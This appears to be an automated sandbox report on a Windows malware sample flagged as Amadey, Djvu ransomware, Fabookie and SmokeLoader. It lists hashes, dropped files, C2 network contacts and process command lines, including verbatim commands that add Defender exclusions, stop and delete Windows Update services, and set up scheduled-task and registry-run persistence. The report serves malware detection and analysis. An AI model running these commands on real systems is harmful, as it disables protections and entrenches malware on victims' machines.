SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

memory/2436-383-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2436-395-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe

MD5 24c40e66db640789a022cb839b28d476
SHA1 b6000f4b0e71ce952267e7e5728bc4181877c497
SHA256 6bbcf743fa00cfa33aa60a923d319850111d610b44cfdbe1b5dc6c672f177a8f
SHA512 481240b66ac8eb61b8a9aa6e22e14abdffba7869695c7b92214029a714b619319d3c50bc640e79bf790de309d5a412f4e0fecabc1082acd52d1984c8c8f8f0cd

C:\Users\Admin\AppData\Local\Temp\1000279001\notepad.exe

MD5 24c40e66db640789a022cb839b28d476
SHA1 b6000f4b0e71ce952267e7e5728bc4181877c497
SHA256 6bbcf743fa00cfa33aa60a923d319850111d610b44cfdbe1b5dc6c672f177a8f
SHA512 481240b66ac8eb61b8a9aa6e22e14abdffba7869695c7b92214029a714b619319d3c50bc640e79bf790de309d5a412f4e0fecabc1082acd52d1984c8c8f8f0cd

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\Temp\2BE7.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
SHA512 297c2384d2a08016daeb5729de304a67b4c5c89203b00941e7258e00ba808448102e2b09bad3a461e9ac7d2f2a33f2d31b5b06f6d57b3628537489309fe8c646

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe

MD5 c74b706ecaa058e6e71e7b4b64dff9df
SHA1 5fa641b867716e397c449a7eeae77e37a0c8c804
SHA256 c2520a713db1ddda557dc6d4ace41e12d02bde143df9275e5fcc48a0fea8a21f
SHA512 ab3b626c27dfaf1b991a3f2650e5c0896f248eed4b10ff903047f63fe72874229138c85615ab063904654b2abc0226ad7e7151148b09731dd761a527a8e4a591

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

\Users\Admin\AppData\Local\63ca3d43-7006-4cf1-98dc-eefc9a624951\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\Temp\1000358001\toolspub2.exe

MD5 932d72dbb9e47863813fde96f1b80bcc
SHA1 f945ba7966a0fa0f006850b76252c8bc8e13d83e
SHA256 73b174c6316230888f3cef2a93ac3f4ba3d35897fa82181cd83beceda6fa7606
SHA512 150b8fc8ba92d008dd80d1328947dec6fb7df09d02eac43e84bd66f0b4f5035d094838ac8f73cdae33ddb7d9a87b9336bef8d3499842ca71e68f60daf0df5dd6

C:\Users\Admin\AppData\Local\Temp\1000359001\3eef203fb515bda85f514e168abb5973.exe

MD5 b79a179e12dd2c67f40297bc597808b0
SHA1 cb1a0ec6f9dbd3ccf6f81a3b4748277fd0c53728
SHA256 504af30f1c8ca0339a2feff60097ed381bbcef9dcbbb26fb1582f57645370fc9
SHA512 0c7ae4f834798c041478190294e789fdc427e58dd991c9a2e63fbc85805d49c91a5bbda5e510da4bcdfc4ca32527677f0cd946d9405ada4c79323944eeefca0d

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-23 11:10

Reported

2023-07-23 11:12

Platform

win10v2004-20230703-en

Max time kernel

30s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 632 set thread context of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3164 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 632 N/A N/A C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 4992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3164 wrote to memory of 4992 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4992 wrote to memory of 4280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4992 wrote to memory of 4280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4992 wrote to memory of 4280 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 632 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\D476.exe C:\Users\Admin\AppData\Local\Temp\D476.exe
PID 3164 wrote to memory of 4480 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3164 wrote to memory of 4480 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4480 wrote to memory of 3344 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4480 wrote to memory of 3344 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4480 wrote to memory of 3344 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3164 wrote to memory of 1584 N/A N/A C:\Users\Admin\AppData\Local\Temp\DA46.exe
PID 3164 wrote to memory of 1584 N/A N/A C:\Users\Admin\AppData\Local\Temp\DA46.exe
PID 3164 wrote to memory of 1584 N/A N/A C:\Users\Admin\AppData\Local\Temp\DA46.exe
PID 3164 wrote to memory of 1612 N/A N/A C:\Users\Admin\AppData\Local\Temp\DC99.exe
PID 3164 wrote to memory of 1612 N/A N/A C:\Users\Admin\AppData\Local\Temp\DC99.exe
PID 3164 wrote to memory of 1612 N/A N/A C:\Users\Admin\AppData\Local\Temp\DC99.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\D476.exe

C:\Users\Admin\AppData\Local\Temp\D476.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\D6D9.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\D6D9.dll

C:\Users\Admin\AppData\Local\Temp\D476.exe

C:\Users\Admin\AppData\Local\Temp\D476.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\D822.dll

C:\Users\Admin\AppData\Local\Temp\DA46.exe

C:\Users\Admin\AppData\Local\Temp\DA46.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\D822.dll

C:\Users\Admin\AppData\Local\Temp\DC99.exe

C:\Users\Admin\AppData\Local\Temp\DC99.exe

C:\Users\Admin\AppData\Local\Temp\E15C.exe

C:\Users\Admin\AppData\Local\Temp\E15C.exe

C:\Users\Admin\AppData\Local\Temp\E814.exe

C:\Users\Admin\AppData\Local\Temp\E814.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\b5911907-77a3-4c03-af46-51f331b5268b" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\F95B.exe

C:\Users\Admin\AppData\Local\Temp\F95B.exe

C:\Users\Admin\AppData\Local\Temp\FCE6.exe

C:\Users\Admin\AppData\Local\Temp\FCE6.exe

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\recognizerespond.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\recognizerespond.exe

C:\Users\Admin\AppData\Local\Temp\F95B.exe

C:\Users\Admin\AppData\Local\Temp\F95B.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\D476.exe

"C:\Users\Admin\AppData\Local\Temp\D476.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\F95B.exe

"C:\Users\Admin\AppData\Local\Temp\F95B.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\D476.exe

"C:\Users\Admin\AppData\Local\Temp\D476.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\F95B.exe

"C:\Users\Admin\AppData\Local\Temp\F95B.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe

"C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe"

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

"C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe"

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build3.exe

"C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build3.exe"

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build3.exe

"C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1612 -ip 1612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1584 -ip 1584

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 1248

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1248

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe

"C:\Users\Admin\AppData\Local\68c6f755-7763-4772-a6bd-cee0894fe0a0\build2.exe"

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe

"C:\Users\Admin\AppData\Local\49b14743-4b55-4121-a8bb-034070746508\build2.exe"

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 potunulit.org udp
US 188.114.97.0:80 potunulit.org tcp
US 8.8.8.8:53 colisumy.com udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
KR 211.168.53.110:80 colisumy.com tcp
US 8.8.8.8:53 110.53.168.211.in-addr.arpa udp
NL 194.169.175.139:3003 194.169.175.139 tcp
US 8.8.8.8:53 139.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 nordskills.eu udp
PS 213.6.54.58:443 nordskills.eu tcp
US 8.8.8.8:53 254.217.0.162.in-addr.arpa udp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 58.54.6.213.in-addr.arpa udp
US 8.8.8.8:53 101.14.18.104.in-addr.arpa udp
US 8.8.8.8:53 80.74.9.45.in-addr.arpa udp
KR 211.168.53.110:80 colisumy.com tcp
FR 178.32.90.250:29608 tcp
FR 178.32.90.250:29608 tcp
US 8.8.8.8:53 250.90.32.178.in-addr.arpa udp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 files.catbox.moe udp
NL 162.0.217.254:443 api.2ip.ua tcp
CA 108.181.20.35:443 files.catbox.moe tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.20.181.108.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
KR 211.168.53.110:80 colisumy.com tcp
US 8.8.8.8:53 zexeq.com udp
KR 220.82.134.215:80 zexeq.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
KR 211.168.53.110:80 colisumy.com tcp
US 8.8.8.8:53 215.134.82.220.in-addr.arpa udp
KR 220.82.134.215:80 zexeq.com tcp
KR 220.82.134.215:80 zexeq.com tcp
US 8.8.8.8:53 greenbi.net udp
AR 190.139.250.133:80 greenbi.net tcp
US 8.8.8.8:53 0.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 133.250.139.190.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
AR 190.139.250.133:80 greenbi.net tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp

Files

memory/2016-134-0x0000000002560000-0x0000000002660000-memory.dmp

memory/2016-135-0x0000000000400000-0x000000000246F000-memory.dmp

memory/2016-136-0x00000000041B0000-0x00000000041B9000-memory.dmp

memory/3164-137-0x0000000002AD0000-0x0000000002AE6000-memory.dmp

memory/2016-138-0x0000000000400000-0x000000000246F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D476.exe

MD5 004a3cb730b4590ce541e289d857650b
SHA1 bc6fcc924a3e867d8e340eb2dca48b38e2014acd
SHA256 214dc3e69982978d353c9f39929981fed9fb68e774e10eefff7a2b3b08103539
